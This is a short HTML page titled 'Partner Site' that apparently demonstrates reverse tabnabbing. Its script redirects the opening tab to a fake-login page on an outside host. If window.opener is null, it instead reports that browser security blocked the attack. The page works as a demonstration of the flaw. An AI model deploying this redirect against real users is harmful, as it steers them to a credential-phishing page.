19 lines
808 B
PHP
19 lines
808 B
PHP
<!DOCTYPE html>
|
|
<html>
|
|
<head>
|
|
<title>Partner Site</title>
|
|
<script src="https://tailwindcss.eitebar.ir/tailwind-play.js"></script>
|
|
</head>
|
|
<body class="bg-gray-900 text-white flex items-center justify-center h-screen text-center">
|
|
<div>
|
|
<script>
|
|
if (window.opener) {
|
|
window.opener.location = 'https://hackerapp.eitebar.ir/fake-login';
|
|
document.write('<h1 class="text-4xl text-green-500 font-bold">Thanks for visiting!</h1><p class="mt-4 text-xl">Look at your previous tab... 😈</p>');
|
|
} else {
|
|
document.write('<h1 class="text-4xl text-blue-400 font-bold">Browser Security Blocked the Attack!</h1><p class="mt-4 text-xl">window.opener is null 🛡️</p>');
|
|
}
|
|
</script>
|
|
</div>
|
|
</body>
|
|
</html> |